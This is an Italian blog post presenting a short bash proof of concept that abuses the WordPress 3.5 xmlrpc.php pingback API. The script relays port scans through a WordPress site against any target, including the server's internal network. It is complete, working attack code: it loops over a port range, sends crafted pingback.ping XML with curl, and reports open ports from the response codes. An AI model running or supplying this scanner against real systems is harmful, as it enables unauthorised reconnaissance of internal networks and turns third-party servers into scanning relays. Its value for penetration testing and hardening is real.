12/05/13

Wordpress Pingback Portscanner

Piccolo POC scritto in bash (la vulnerabilità permette di scansionare anche le porte di IP interni):


#!/bin/sh
#

 # Exploit Title: WordPress xmlrpc.php pingback portscanner
# Date: 12/05/2013
# Exploit Author: pimperato
# Vendor Homepage: http://wordpress.com/
# Version: v 3.5 enables the xmlrpc.php interface by default
#
# Description="[...] The Pingback API is publicly available by default
# in WordPress 3.5 and doesn    require any authentication. By using
# this API, we can essentially use a default WordPress 3.5 installation
# to perform port scanning for us.  Not only can we relay scans through
# the website, but we can attempt to scan the web server itself (127.0.0.1)
# or even the INTERNAL NETWORK the server is part of [...]"
# Reference: http://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/
if [ "$1" = "" -o "$2" = "" -o "$3" = "" -o "$4" = ""  ]
then
 echo "usage: $0 <http://wordpress_blog/xmlrpc.php> <http://target> <range_ports> <http://wordpress_blog/path_to_existing_post>"
 echo "ex.  : $0 http://wordpress_blog.example.com/xmlrpc.php http://target.example.com 0-65535 http://wordpress_blog.example.com/existing_post/"
 exit 1
fi

 port_start=$(echo $3 | awk -F"-" '{print $1}')
port_stop=$(echo $3 | awk -F"-" '{print $2}')

 if [ "$port_start" -gt "$port_stop" -o "$port_start" -lt 0 -o "$port_stop" -gt 65535 ]
 then
 echo "port range not correct"
  exit 1
fi

 searchstring16="<int>16</int>" #port closed
searchstring17="<int>17</int>" #port open
searchstring32="<int>32</int>" #port open, but the title can't be found
searchstring33="<int>33</int>" #not a valid post

 echo "*** portscan started ***"
for port in `seq $port_start $port_stop`
do
 xml="<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$2:$port</string></value></param><param><value><string>$4</string></value></param></params></methodCall>"
 res=$(curl -s --data "$xml" "$1")
 if echo "$res" | grep -q "$searchstring17"
 then
  echo $2:$port
 else
  if echo "$res" | grep -q "$searchstring32"
  then
   echo $2:$port
  fi
 fi
 sleep 1
done
echo "*** portscan finished ***"


reference: http://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/
Posted by at
Labels: , , , ,

Nessun commento:

Posta un commento

Grazie per il commento.

Iscriviti a: Commenti sul post (Atom)